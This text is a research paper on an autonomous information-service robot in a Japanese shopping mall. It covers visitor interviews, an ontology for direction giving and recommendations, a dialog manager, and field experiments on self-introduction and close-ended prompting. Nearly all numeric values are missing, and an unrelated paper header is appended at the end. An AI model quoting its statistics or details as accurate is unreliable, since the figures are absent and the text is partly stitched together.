with display), which very much changes the way of giving direction. information in a shopping mall we investigated the daily tasks of information service employees and what visitors typically expect from robots acting as such. we found a lot of similarities. the study protocol was approved by institutional review boards of advanced telecommunications research instituted international with reference number - - . daily tasks of information service we interviewed two employees working at the information desk of a shopping mall. first we asked an overall description of their job: they usually wait for visitors to come to the information booth. 
they were requested by the mall administrators to serve as ‘information staff.’ only procedures for lost items were provided; for other tasks (e.g., information providing) they use their common sense. further, we asked them to categorize the typical requests from visitors, and how they would respond. both reported that there are three types of requests: direction giving: they reported that this is the most frequent request. visitors ask simple where-type questions, e.g., “where are the toilets?” in addition to the name of locations, people use other popular name, like “hello show,” or the name of designated areas, like “smoking area.” their typical response is to provide turn-by-turn directions using utterance and pointing gesture. when visitors do not understand, they sometimes write down to a map, or on rare occasions take them to the destination. recommendation (inquiry): when a visitor does not know whether there are shops that meet his needs, he may query the information staff. visitors may inquire of the characteristics of shops, such as name of items, and the category of shops. here are some examples of questions: “are there japanese restaurants?”; “are there shops that sell osaka souvenirs?” the staff members typically verbally list the shops or events that meet their criteria. visitors sometimes ask for a recommendation from the staff without providing satake et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. solid conditions but only using subjective words e.g., “are there any good restaurants?” for such requests, the staff members reported that they typically try not to give a subjective preference, because their preferences may or may not match with those of the visitors. thus, their responses for inquiry and recommendation are similar: they try to objectively reply and provide a list of shops that seem appropriate. lost child and lost-and-found: when children are lost, or when visitors lose items, they come to the information desk. for lost children, the staff usually makes a public announcement throughout the shopping mall. lost items can be retrieved at the information booth when available upon confirmation of ownership. expectations from information robot to investigate what people expect from information robots, we interviewed customers in the shopping mall. to find people who would be willing to help us with collecting knowl- edge for future robots, we prepared a situation where visitors can see a robot in the midst of interaction. thus, we prepared a robot for information, which is controlled with wizard- of-oz method. we then asked people who stopped around the robot and/or interacted with it to participate in the interview. twenty-one visitors participated in the interview. in the interview, we asked the visitors to imagine future situations in which robots would be capable of offering information services they like, regardless of their previous observations of the robot’s capability. we then asked them to freely provide as many functions they would like information robots to have. the interviews were recorded and transcribed for analysis. we categorized the different kind of requests expressed by the visitors, for instance, visitors reported sentences such as: “i often look for the smoking area, thus i would like to ask the robot about it.” this utterance was coded as expectation for direction giving, because we interpret it as ‘where’-type question in which visitors simply want to know the location. 
the followings ones were coded as expectation for recommendation (inquiry): “i’d like to know about sports and furniture shops.” “the shop which sells the most? well, i want the robot give me recommendations of shops.” such cases were classified as recommendation (inquiry), because visitors need to know more information than just a location. then, two coders who do not know the research purpose judged whether each transcribed sentence would fit into the above defined categories, or not (which is categorized as ‘other’). the judgement of the two coders matches reasonably well, yielding kappa coefficient . . table shows the coding result. the ratio of visitors who mention the expectation is listed in each row. they can provide multiple answers, thus the sum of the ratios exceeds %. the expectation of the visitors for the information robot largely overlaps with what human information services provide. almost all visitors ( out of ) mentioned that they expect direction giving and the majority ( out of ) reported that they expect the satake et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table the analysis result of expectation for information. expectation ratio direction giving . % recommendation (inquiry) . % other playing with children . % lost child . % robot to offer turn-by-turn direction accompanied with pointing gesture. for instance, one spontaneously mentioned the practicality of pointing gesture in directions giving: “well, ‘where,’ umm, i did not understand ‘which’ direction i should go. so it would be useful if the robot could do pointing gestures,” there were visitors who expected the robot to take them to the destination, and visitor who wanted the robot to explain with a map. there were people that expected a recommendation service. for instance, some mentioned “i’d like to have some recommendations for restaurants,” or “i’d like to know places where children can play around.” others wanted to have more detailed explanations. for instance, one commented: “i’d like to know what kind of shop it is, its atmosphere, what it sells, and so on.” in contrast, the ‘playing with children’ category is specific to the information robot. we collected comments such as: “interacting with the robot was enjoyable. this is good for people who come with their children”. “many families only have one child. it would be nice if the robot behaved like a brother.” requirements the expectations for information robots largely overlapped with what is delivered at human information services. that is, most of them expect two services: direction giving and recommendations. thus, in this study, we focused on these two services. further, we investigated the required knowledge to be stored. we analyzed the utterances of the requests. we labeled them based on the type of request. for instance, we assigned a label ‘name of location’ to the utterance “i’d like to know where the event dream world takes place,” ‘name of item’ to the utterance “i’d like to know where can i buy coffee.” if multiple labels are applicable we assigned all of them. labels are merged when possible, resulting in different labels. to confirm the classification, we asked two coders who did not know the purpose of the research to classify the utterances based on the labels. their coding matches reasonably well, yielding kappa coefficient of . . finally, we identified that the following information is needed: ( ) name of location: such as names of shops or names of events. 
in addition to the formal name, people use various nicknames. . % of people mentioned this category. satake et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure system architecture. ( ) item name: people look for specific product or entity available in shops. for instance, this category includes items such as “cell phone charger” and “coffee.” . % of people mentioned this category. ( ) category: shops can usually be grouped into larger categories, like “restaurant,” “japanese restaurant.” . % of people mentioned this category. ( ) features: shops are usually recognized as some generally-known features, like “good view,” “expensive,” and “recommended.” . % of people mentioned this category. ( ) people activity: locations are sometimes referred as the activity that people do there, like “play,” “eat,” “shop.” . % of people mentioned this category. ( ) people’s state: locations are sometimes referred as the place appropriate for people’s physical condition, like “injured,” “tired,” “hungry.” for instance, some visitors said: “i would like to receive recommendation, just by saying ‘i’m hungry’ for example.” . % of people mentioned this category; note that this request was not reported by the information desk staff, thus it can be considered as specific to the information robot. based on this analysis, we developed the knowledge representation for the information robot. system architecture our goal is to develop a robot that autonomously provides information services. based on the analysis in section ‘information in a shopping mall,’ we developed a knowledge representation that can be used by such a robot. figure shows the architecture of the system. information from sensors goes through modules like people tracking (explained in section ‘people tracking’), localization (section ‘localization’), and speech recognition (section ‘speech recognition (with human operator)’). output from these modules are used in the behavior controller (section ‘behavior controller’), which contains a dialog manager (section ‘dialog manager’). the environmental knowledge is stored in ontology (section ‘ontology of entities in the map’) and map (section ‘route perspective map’), and used by the dialog manager. we explain these modules in the later section. satake et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure environment of the shopping mall. figure knowledge representation for the environment. knowledge representation there are two types of information in the knowledge representation. one is the map used for direction giving (explained in section ‘route perspective map’). the other is shop-related data (explained in section “ontology of entities in the map’). environment the study was conducted in a big shopping mall located in a suburban area. it consists of three buildings (fig. a), one having floors, and others having floors. there are shops, restaurants, facilities, event halls, squares (e.g., fig. b), stages, and many offices. the mall is mainly busy during weekends. almost all shops are for non-daily goods, like clothes, shoes, sports, outdoor activities. we often observe people who look for shops and locations (e.g., they look at the floor maps, and/or ask the service staff ). the main hall where big events take place is located far (a min of walk) from the square where we put the robot, thus people often asked where an event was taking place. 
ontology of entities in the map we designed our knowledge representation for ‘request’ and ‘shops’ together using an ontology language, owl (mcguinness & van harmelen, ). figure shows the designed knowledge structure, i.e., ontology. the basic element in owl is the ‘class,’ which has ‘properties’ that store the information. there are two primary classes, ‘location entity’ and ‘requestable property’ prepared. satake et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table possible relationships. users’ request possible relation item name is sold at/is served at/is at category belongs to features is a feature of people activity is possible at people’s state is satisfied/healed/solved at location entity we define entities like shops, facilities and events as instances of the ‘location entity’ class. there are three properties: ( ) name: we stored the official or commonly used name. ( ) nicknames: some shops are referred to with a nickname. we listed such nicknames people could use. for example, “kentucky fried chicken” is referred as “kfc.” ( ) location on the geometrical map: each location is associated with the geometrical map (explained in the section ‘route perspective map’). we further separate the class into two subclasses, selective location and non-selective location. when multiple locations are available, people would prefer to select one. for instance, if there are two italian restaurants, people would choose one based on their own criteria, such as better, cheap, popular, etc. we store one extra property, ‘introduction property,’ in selective location to be used in dialog to help people selecting locations. in contrast, people would usually not care about which toilets to which they would go. such locations are implemented as non-selective location class. requestable property there are six types of information communicated in information dialog (section ‘requirements’). except for name of location, they are realized as ‘requestable property’ class, which has subclasses ‘item name,’ ‘category,’ ‘features,’ ‘people activity,’ and ‘people’s state.’ when a user requests information, it is turned into an instance of the ‘requestable property.’ then, the location(s) having the same property will be searched. each property item has wordings that are expected to be used in people’s utterance. for instance, ‘eat’ (instance of people’s activity subclass) is associated with wordings such as “eat,” “have lunch,” and “have a meal.” note that more complex requests (e.g., “japanese” restaurant with a “good view”) can be represented as multiple instances combined with ‘and/or’ operators, but we did not implement such complex operations because users rarely made such complex requests. relationships between ‘location entity’ and ‘requestable property’ table shows possible relationships between two subclasses. for instance, some visitors could request a restaurant where they can have “pasta.” to handle such requests, a “pasta” entity is prepared as an instance of ‘item name’ subclass which is associated with shops with satake et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure illustration of the route perspective map. the relation ‘is served at.” such relation is defined inside dialog management (section ‘be- havior controller’) as well. 
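as a concrete illustration of this structure, the sketch below models location entities and requestable properties as plain python objects and resolves a user's wording to the matching locations, which is essentially the lookup the dialog manager performs. the shop names, wordings, and relations here are invented for the example, and the actual system stores this knowledge in owl rather than in python.

```python
from dataclasses import dataclass, field

@dataclass
class LocationEntity:
    name: str
    nicknames: list = field(default_factory=list)
    selective: bool = True        # non-selective entities (e.g., toilets): just pick the nearest one
    introduction: str = ""        # used in the recommendation dialog for selective entities

@dataclass
class RequestableProperty:
    kind: str                     # 'item name', 'category', 'feature', 'people activity', or "people's state"
    wordings: list                # phrases expected in users' utterances
    locations: list               # entities linked via relations such as "is served at"

# hypothetical fragment of the knowledge base
kaika_ya = LocationEntity("kaika-ya", nicknames=["the ramen shop"],
                          introduction="they serve a ramen with tuna soup.")
food_court = LocationEntity("food court")
KNOWLEDGE = [
    RequestableProperty("people's state", ["hungry", "starving"], [kaika_ya, food_court]),
    RequestableProperty("item name", ["ramen"], [kaika_ya]),
]

def resolve(utterance: str) -> list:
    """Return locations whose requestable-property wordings appear in the utterance."""
    hits = []
    for prop in KNOWLEDGE:
        if any(w in utterance.lower() for w in prop.wordings):
            hits.extend(prop.locations)
    return hits

print([loc.name for loc in resolve("I'm hungry")])   # ['kaika-ya', 'food court']
```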
note that an instance of ‘requestable property’ can be associated with multiple ‘location entities’ (e.g., “pasta” can be served at multiple restaurants). finally, we prepared the data for the shopping mall (section ‘environment’). there are location entities ( shops, service facilities, events, and buildings) with in total , nicknames. there are requestable properties ( items, categories, features, people activities, people’s states) prepared as well. route perspective map informed by morales et al. ( ), we manually prepared a route perspective map (illustrated in fig. ), which consists of pairs of landmarks and actions. using the map, the system generates turn-by-turn directions giving, such as “go straight, turn left at the book store, go out the door with exit sign . . . .” the map includes the following information: ( ) topological map: nodes are located at decision points in the map. transition through corridor or between different floors, such as stairs, escalators, and elevators, are expressed as movements between nodes. entrances of shops, facilities, and events (i.e., location entity) are also represented as nodes. ( ) landmarks: if available, visible landmarks are manually associated for each route as denoted in morales et al. ( ), e.g., famous shop names with salient signboards, elevators, and escalators. ( ) actions: in morales et al. ( ), actions were only turning behaviors, which were computed from a topological map. in contrast, as there are many floors and multiple buildings, we added actions like “enter the next building,” “go to the rd floor.” satake et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. behavior controller when a person stops by the robot (within . m for . s), or is detected as approaching at . m from it, it starts a dialog. the robot orients its body and gaze to the user. when there is no user, the robot shows liveliness by slightly moving head and arms. during the dialog, its head and body is oriented toward the user, except for the moment when it performs a pointing gesture which is often used when giving directions. when it points at a direction, its head direction is oriented toward the pointed direction for the first three seconds of pointing in order to draw the user’s attention toward the pointed direction. the robot ends the dialog when the user leaves the robot’s side ( m away), or when the dialog management module decides to end the dialog. dialog manager we developed a rule-based mechanism for dialog management. assuming that there is an input coming from the speech recognition module (explained in ‘speech recognition (with human operator)’), the input is turned into text and matched with name/nickname properties of location entities and with instances of requestable properties (explained in ‘ontology of entities in the map’). if a requestable property matched, it is compared with location entities. when only non-selective locations are matched, it chooses the nearest one. in case the user asked for a location with a specific name of location, there should be only one location to be matched. in these cases, the system provides direction-giving dialog, in which turn-by-turn directions to the location are generated. otherwise, it initiates a recommendation dialog. it verbally lists the locations that match with the requestable property instance one by one. for each location, it explains the location using the text in its introduction property. 
for instance, it utters “ramen is served at a ramen restaurant named kaika-ya. they serve a ramen with tuna soup. may i explain the directions to go there?” as human staff does, we carefully avoid telling subjective preferences, but only provided objective facts. in addition, it reacts to the words for greeting. when an input matches with words like “hello,” it returns a greeting utterance. when an input matches with leave-taking words like “bye,” it returns leave-taking words and ends the dialog. when no location is matched, the system explains that “(requested item) is not in this shopping mall. i only know about this mall.” other modules robot we used a robot characterized by its human-like physical expressions. it is cm high and cm in diameter on a mobile platform. it has a -dof head and -dof arms. there are two m range laser sensors attached. we used the robot with a maximum speed of mm/sec and ◦/s for rotations. the accelerations are set to mm/s and ◦/s . to clearly communicate its role, we put an ‘information staff ’ sign in japanese on the chest of the robot (fig. ). satake et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. people tracking we use a people tracking method described in brscic et al. ( ), which provides an estimation of the location of pedestrians every ms. it covers the square we used. there are -d range sensors attached on the ceiling (combination of panasonic d-imager, asus xtion, and velodyne hdl- e). localization for robot localization, we use a particle filter with a ray tracing approach on a grid map (fox, burgard & thrun, ). the grid map is built from odometry and laser scanner data. this module is called every ms and updates the robot’s position. speech recognition (with human operator) we developed fully-autonomous system using asr (automatic speech recognition), but in order to better test the overall framework we used a human operator instead of asr. automatic speech recognition (asr). we used an asr software, atrasr (matsuda et al., ). it uses a language model based on fsa (finite state automaton). we constructed the language model mainly using the terms appeared in the ontology. with preliminary trials using the wizard-of-oz approach, we analyzed the way visitors speak to the robot. in total, requests collected over days of preliminary trials. from the analysis of the requests, we found that they mainly follow three ways of speaking, as follows: • noun/adjectives only: people only spoke words like a name (nickname) of location, category, or item name, such as “restaurant,” and “coffee.” sometimes, for features and people’s activity, they add such terms like “place for” (eat/lunch/play). some ontology items are adjectives, such as “tired.” people sometimes only spoke such adjectives. • “where is” question: the above noun is used in “where is” question, such as “where is kaika-ya (the name of restaurant) ?” • “i would like to” sentence: people also use the form of “i would like to” + “verb” + “noun” in requesting sentences, such as “i would like to buy coffee.” for all names, nicknames, and requestable properties, we automatically generated grammatical structures for asr. further, we added the following grammars. first, some basic verbs like “go” can be used in “i would like to” type sentences but were not included in the ontology (as they by themselves does not represent any specific request), which we manually added ( verbs). 
second, we added filler words, such as “well,” “ah,” that appear in advance to questions ( words). third, to eliminate noises from environments, like sounds from people’s walking, whistle from ships, we added some fillers ( fillers). overall, we prepared the lexicon whose size is , with , links. satake et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. the asr outputs the matched names, nicknames, or requestable properties, which are used in the dialog manager to determine the answer to be provided. in case the asr detects the recognition to be less reliable (because the input does not match well with its language model), the dialog manager prompts the user to say again with utterances like “could you repeat please?” the asr is deactivated while the robot is speaking. we evaluated the system performance using this asr implementation. we put the robot on a square of the mall (fig. b), and let the visitors freely use it. with our preliminary test, with users, there are requests, for which the robot was only able to correctly respond in . % of the cases. (in a similar study only . % of successful recognition was achieved matsuda et al., .) there were types of errors: error in sound detection error (due to other ambient sounds, the system failed to detect the start of utterance) ( . %), asr resulted in low reliability score ( . %), utterance did not match with the prepared grammar/vocabulary ( . %), and mis-recognition in asr ( . %). in case the mis-recognition occurred, often the system seemed to be interfered by ambient noise, which was matched with some vocabulary in the lexicon. in contrast, in case asr successfully detected the names, nicknames, or requestable properties, the system provided appropriate answers. overall, this preliminary test revealed that the system is capable of handling users’ utterances when the asr is successful, while we would yet need to wait asr technologies to be ready for real world environments. wizard-of-oz. the system is ready for autonomous speech recognition. but, for this study, to focus on other parts of interaction rather than working for errors in speech recognition, we used a human operator only to support speech recognition. we strictly limit the task of the operator, and have him work like the dumb asr software described in the previous section. we did not allow the operator to add his knowledge. just like the output from the asr, the operator only typed the words spoken by the user. for instance, to our knowledge, if a user asks for a “place for lunch” but such wording is not in the system vocabulary, in previous studies wizard-of-oz operators replaced such words to the ones system can handle, like “restaurant”; by doing so, the system can work with a very limited vocabulary and knowledge. instead, with our system, a novice person who does not know the environment (e.g., list of shops) can easily serve as an operator. preliminary trials: lack of ‘knowledge’ for interaction we conducted a preliminary study with the system reported in the previous section. we initially intended to supplement missing data and evaluate its performance. we found the system itself worked well (we will report in section ‘evaluation of system performance’); however, interaction failed in other parts we did not think about. that is, some visitors responded in an unexpected way. 
in short, until this study was conducted, we focused on the ‘information’ aspect, which we found to be satisfyingly prepared, but we found a problem in ‘interaction.’ satake et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure the interaction failed because the visitor did not speak. figure the visitor kept silent after prompted. here, we report two typical cases of failures. from these cases of failures, with a trial-and-error approach, we seek the reason why interaction fails and seek for better pattern of interaction for the problem. finally, we generate hypotheses about missing knowledge in interaction (to be reported in the next section). case : interaction did not start the initial version of the robot imitated the interaction of human information staff. it waited for the arrival of the visitors, and waited for them to make a request. this is what a human staff member would do. the signboard showing ‘information staff ’ on the chest of the robot was very visible, so we expected that every visitor would have common expectations as those investigated in section ‘expectations from information robot.’ however, frequently people would stay in front of the robot without saying anything. figure shows one of such cases. a man stopped in front of the robot, and the robot was ready to receive a request, orienting its body and head toward him; but, without talking to it, he moved to a side of the robot, and the robot followed. he moved back, and it followed again. finally, he left after s of silence. case : passive visitors further, we noticed that the conversation got stuck when it asked for a request, even though the user initially spoke to the robot. for instance, fig. shows a visitor who engaged in greeting, but came to be silent when prompted to ask request. she left after s of silence after being prompted. satake et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. we interpreted that such people do not have concrete requests in their mind, thus they were stuck when asked to offer requests. field experiment for each case of problems found in the preliminary trial (reported in the previous section), we generated a hypothesis, and conducted an experiment to confirm our idea to supplement such weakness. the study protocol was approved by institutional review boards of advanced telecommunications research instituted international with reference number - - . experiment hypothesis we initially replicated the way human staff interact with visitors. that is, we make it clear that the robot is serving as information staff. assuming that visitors have the common expectations the purpose of information staff we let the robot wait for a visitor to make a request, and to prompt to request if not asked. however, this assumption was not always correct. visitors may not share or may be unsure about their expectations of the ‘information robot’ role. if this is the case, we can probably moderate the problem by letting the robot first explain its role (direction giving and recommendation). thus, we made the following prediction: prediction : if the robot proactively explains its role as information staff, people will more frequently request information from it. participants the study was conducted during weekends. the participants were visitors of the shopping mall who are typically group of friends and families who come to the mall for leisure. 
the mall is big and the layout is complicated, thus people are often in real need of getting directions from someone. when a robot is placed on the mall, people sometimes stopped at the robot. we assumed that such people who stopped at the robot as the participants. condition there are two conditions compared. - with self-introduction: when a person stops, the robot starts self-introduction. it says, “hello, i can provide directions and recommendations.” then, it prompts him/her to request “may i provide you some information?” - without self-introduction: when a person stops, the robot waits him/her to request without speaking to the user. in both conditions, when a visitor requests it immediately moves into the information dialog. after s of silence, the robot closed the interaction saying “bye-bye.” procedure the robot was placed at a square of the mall (fig. b). we choose this location because visitors often arrive from the nearby escalator, and need direction giving around this satake et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. location. the study was conducted during daytime on weekends. we prepared six pairs of -minutes time slots. for each pair, two conditions were assigned. between the slots, we put -minutes break, so that visitors are not influenced by the adjacent time slot. the visitors of the mall were able to freely interact with the robot. there was a signboard showing ‘information staff ’ on the frontal side of the robot, which was clearly visible to the visitors. beyond that, there were no restrictions nor instructions provided to visitors. there was a person ensuring safety, but he stayed behind a column so that his presence was hardly noticeable from pedestrians. in such circumstances, we observed the pedestrians’ natural reaction to the robot. measurement considering the role of the information staff, we define the success of the interaction as follows: success: the case where the robot was able to receive a request and offered appropriate information/service. we coded the success from the recorded video. note that we only evaluated people who stopped in front of the robot (more than s) and faced towards it; we consider that letting people stop is beyond the scope of this paper. if the same person interacted multiple times, only the first one was evaluated. further, we only evaluated one participant per group (i.e., only the first member of the group, who stopped and faced the robot, was counted as our participant), so that the experiment would not suffer from other members’ prior interactions. result in total, there were interactions evaluated, which were coded by two coders who did not know the study hypothesis. one coded the whole data and the second one did confirmatory coding for % of the data. their coding results matches well (kappa coefficient . ). figure shows the result of the study. there were . % of the successful interactions in the with self-introduction condition, while . % in the without self-introduction condition. typical failure was, like the one shown in fig. , when visitors stayed in front of the robot but remained silent even if they were prompted to talk to the robot. some visitors left in the middle of the conversation, and some explicitly said they did not need service ( cases in with self-introduction condition). we applied a chi-square test to evaluate the ratio of success against failures. there is a significant difference between the conditions (χ ( ) = . , p < . 
, ϕc = . ). thus, prediction was confirmed. when the robot provides self-introduction, the interactions ended with success more frequently. we interpret that even though the robot serves an ‘information’ role, people should share a common expectation. unless it explains its role, some people might fail in using it. discussion it is plausible that there are two sources of failure addressed. one is the belief that the robot can talk to them; another is the expectation that it offers information. we mainly argued satake et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure result of the experiment . the second point, but it simultaneously offered help for the first element. thus, one would argue that it is better to compare with a robot that only speaks to users but does not provide self-introduction. however, it was not easy to prepare such a condition when the robot only shows the capability that it can talk in the context of information service. for instance, if it only greeted people, visitors might expect it to engage in variety of interactions, but in reality the robot can only react for the ‘information’ role. thus, although the effect would be due to both elements, we conducted the study in such a way. it remains as an open question what is the best length of self-introduction. we could make it short and only imply its task by saying something like “may i help you?” we consider that to our observation, people did not get bored due to length of the self-introduction and thus it could be considered as reasonable. experiment hypothesis in the experiment , we found that self-introduction moderated the problem of failure; yet, interaction failed for about % of the visitors. we hypothesized that there are visitors who initiated interaction out of curiosity, without a concrete request in mind. such people would be stuck when a robot prompts them for a request in a direct way. we hypothesized that we can moderate this problem, if the robot turns its offer into a question that they can easily answer. thus, we made the following prediction: prediction : if the robot prompts a user for a request in a way of questions they can easily answer, people will more frequently make requests to the information robot. participants the same procedure was used as in experiment . satake et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure result of the experiment . condition there are two conditions compared. in both conditions, when a person stops, the robot starts with a self-introduction, saying “hello, i can provide directions and recommenda- tions.” this is identical to the wording used in experiment . after a short pause, the robot utters “i will give recommendations based on the locations you are going to,” and prompts the user to ask. the prompting utterance differs depending on the following condition: - open-ended prompting: it prompts the user by saying “what kind of recommendation do you wish?” - close-ended prompting: it prompts the user by saying “where are you going?” in both conditions, whenever a visitor requests something to the robot, it immediately moves into the information dialog. if the user keeps silent for s, it once repeats the prompting utterance. if there were s of silence after the prompting utterance, the robot closed the interaction saying “bye-bye.” procedure the same procedure was used as in experiment . 
we prepared seven pairs of -minutes time slots. measurement the same measurement was used as in experiment . result in total, there were interactions evaluated, which were coded by two coders who do not know the study hypothesis. one coded the all data and second one did confirmatory coding for % of the data. their coding results matches well (kappa coefficient . ). figure shows the result of the study. there were . % of successful interactions in close-ended prompting condition and . % in open-ended prompting condition. similar to the experiment failure cases, some visitors kept silent when prompted, some visitors left satake et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. in the middle, and some explicitly said they did not need the service ( cases in close-ended prompting condition). we applied a chi-square test to evaluate the ratio of success against failures. there is a significant difference between the conditions (χ ( ) = . , p < . , ϕc = . ). the prediction was consequently confirmed. when the robot’s prompting was close-ended, the interaction was more frequently successful than open-ended prompting. we interpret that as predicted many visitors did not have requests in mind and got stuck when asked to request; instead, if the robot offered a prompting utterance that invited the user to talk about what they know (e.g., their destination), it will more easily continue the dialog and offer information requested by the user. discussion there are some open questions remaining. one would argue that those who kept silent are people who did not want to ‘hear’ the information, thus they did not respond to ‘hear’ questions in close-ended prompting. it is possible that they did not have that much will to spontaneously ask the robot to provide information; nevertheless, in open-ended prompting condition, people who were coded as success stayed until the robot finished providing information. one would also argue that the robot could anyway give information even if visitors kept silent. this is possible, and maybe the robot should do so for the remaining . % of people. our assumption is that it is probably better if they hear information they requested, rather than randomly chosen information. we could not fully clarify why the remaining . % of people who kept quiet in close-ended condition. we tried to interview such people, but they did not want to be interviewed. evaluation of system performance throughout the experiment and , the robot was controlled with the system reported in ‘system’. in total, there were requests made for the information robot. we analyzed how they were handled, and evaluated whether the robot’s responses were correct. . % of the case requests were a name of location and . % were a nickname. in the other cases, these requests were turned into requestable properties: there were . % item name, . % category, . % feature, . % people activity, and . % people’s state. in . % of cases, the system provided direction-giving service, and . % recommendation service. the appropriateness was evaluated by coders who do not know the study hypothesis. they judged based on the following criteria: correct: the information the user requested is included and correct in the response from the robot. for instance, when a user asked “are there japanese restaurants?” the coder judged whether the robot provided the information about any japanese restaurant (if any), and whether the provided information is correct. 
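throughout the coding described here and in the two experiments, agreement between the two coders is summarized with a kappa coefficient. the sketch below shows how cohen's kappa could be computed from two coders' labels; the label sequences are hypothetical, since the raw codings are not published in the paper.

```python
from collections import Counter

def cohen_kappa(labels_a, labels_b):
    """Cohen's kappa for two coders' categorical labels of the same items."""
    assert len(labels_a) == len(labels_b)
    n = len(labels_a)
    observed = sum(a == b for a, b in zip(labels_a, labels_b)) / n
    freq_a, freq_b = Counter(labels_a), Counter(labels_b)
    # chance agreement from the two coders' marginal label frequencies
    expected = sum(freq_a[c] * freq_b[c] for c in set(labels_a) | set(labels_b)) / (n * n)
    return (observed - expected) / (1.0 - expected)

# hypothetical codings of ten interactions by two independent coders
coder1 = ["correct", "correct", "incorrect", "correct", "correct",
          "incorrect", "correct", "correct", "correct", "incorrect"]
coder2 = ["correct", "correct", "incorrect", "correct", "incorrect",
          "incorrect", "correct", "correct", "correct", "incorrect"]
print(round(cohen_kappa(coder1, coder2), 2))   # 0.78 for this made-up example
```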
the coding results show moderate matching (the kappa coefficient was . ). there were . % of cases judged as correct. incorrect cases were caused by a missing nickname ( cases), users who left before the information was provided ( cases), the operator's mistyping ( cases), and complex requests which the system was unable to handle ( case). overall, we believe that the system was able to cover the requests from users reasonably well. (figure : a scene of correct and successful interaction.) figure shows one example of an interaction scene in which the robot provided correct information. the visitor asked a 'where' question using the name of a furniture shop, which was matched with the location entity instance of that furniture shop. the robot therefore provided directions to the shop while pointing in its direction. she listened to the directions while looking at the robot; when the robot pointed, she looked toward the pointed direction. finally, she said "thank you!" to the robot and walked in the pointed direction. (figure : request made based on the visitors' state.) figure shows a scene where the visitors' request was based on their physical state. they only said, "i'm hungry." the robot was able to associate this with restaurants, so it recommended a ramen restaurant. they asked it to provide directions to the restaurant, and the robot pointed in the direction and explained the route. overall, the system worked reasonably well.

limitation
the content of the knowledge can be local to the specific environment, robot, language, culture, and so on. the common sense about what an information service is would differ across cultures. thus, if our study results were to be applied somewhere else, although we believe that most of the framework and structure of the knowledge is pertinent, we would probably need to carefully adjust the knowledge. for instance, it is plausible that people in other cultures would inquire about information in a different form. knowledge about interaction would also differ: people in other cultures can be more or less open, active, hesitant, and/or curious, so the effectiveness of such strategies can differ.

conclusion
we investigated the knowledge relevant to an information robot. first, we confirmed that what visitors expect from an information robot overlaps well with what human information staff do. we developed a knowledge representation for the information robot, and our field study confirmed that this knowledge representation was useful: when users made requests, the robot was able to provide information with . % success. however, the study also revealed that many people did not behave in the same way as they do with human staff. our initial version of the interaction flow achieved only . % success in providing information, and the visitors in the failure cases kept silent during the interaction. through our field experiments, we found that some people need the robot to give a self-introduction about its role, and some people need close-ended prompting, i.e., letting users talk about what they know in order to make a request, instead of letting them generate a request on their own. finally, the robot was able to provide information for . % of visitors. what we changed might be subtle, yet it changed the results quite a bit.

acknowledgements
we thank the staff of the atc shopping mall for their support.
additional information and declarations

funding
this work was supported by the japan science and technology agency (jst) and its crest program. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

grant disclosures
the following grant information was disclosed by the authors: japan science and technology agency (jst). crest.

competing interests
takayuki kanda is an academic editor for peerj computer science. satoru satake, keita nakatani, kotaro hayashi, and takayuki kanda are employees of intelligent robotics and communication laboratories (irc), advanced telecommunications research institute international (atr).

author contributions
• satoru satake conceived and designed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work.
• keita nakatani performed the experiments, analyzed the data, prepared figures and/or tables.
• kotaro hayashi performed the experiments, prepared figures and/or tables.
• takayuki kanda conceived and designed the experiments, contributed reagents/materials/analysis tools, wrote the paper, reviewed drafts of the paper.
• michita imai contributed reagents/materials/analysis tools.

ethics
the following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): the study protocol was approved by the institutional review boards of advanced telecommunications research institute international with reference number - - .

supplemental information
supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information.

references
brscic d, kanda t, ikeda t, miyashita t. . person tracking in large public spaces using d range sensors. ieee transactions on human-machine systems : – doi . /thms. . .
cassell j, stocky t, bickmore t, gao y, nakano y, ryokai k, tversky d, vaucelle c, vilhjálmsson h. . mack: media lab autonomous conversational kiosk. in: proceedings of imagina, vol. , – . available at http://alumni.media.mit.edu/~tstocky/pubs/cassell.stocky_imagina .pdf.
daniel m-p, tom a, manghi e, denis m. . testing the value of route directions through navigational performance. spatial cognition & computation : – doi . /s scc .
fox d, burgard w, thrun s. . markov localization for mobile robots in dynamic environments. journal of artificial intelligence research : – .
international conference on sensor network and computer engineering (icsnce )

quadrotor formation inversion control method based on unit quaternion

wang zhongsheng, school of computer science and engineering, xi'an technological university, xi'an, china, e-mail: @qq.com
yang sen, department of uav engineering, ordnance engineering college, shijiazhuang, china; school of automation science and electrical engineering, beihang university, beijing, china
dong hairui, department of uav engineering, ordnance engineering college, shijiazhuang, china

